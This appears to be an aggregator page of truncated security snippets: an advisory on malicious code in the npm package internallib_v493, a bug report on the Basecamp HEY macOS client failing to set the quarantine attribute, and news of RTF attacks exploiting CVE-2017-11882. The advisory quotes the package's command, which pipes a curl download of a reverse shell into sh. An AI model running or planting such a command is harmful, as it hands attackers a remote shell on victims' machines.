Malicious code in internallib_v493 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 67451793d9877224d7acc26100c76cd2378f45c39354f89ca1e0dd37565741b7 The package's sole exported function command in index.js executes /bin/bash -c "curl https://reverse-shell.sh/10.0.74.90:4444|sh", fetching a...

Basecamp: Lack of quarantine macOS attribute(com.apple.quarantine) leads multiple issues including RCE

Hi, basecamp team. HEY macOS client does not properly validate file uploads on its macOS inbox. That is because, by not setting the com.apple.quarantine attribute in the metadata of an executable file when it is uploaded, you allow the file to be executed on macOS without being checked by...

Microsoft Warns of Email Attacks Executing Code Using an Old Bug

Microsoft is warning of a fresh email campaign that distributes malicious RTF files boobytrapped with an exploit dating back to a 2017 vulnerability, CVE-2017-11882. The exploit allows attackers to automatically run malicious code without requiring user interaction. “The CVE-2017-11882...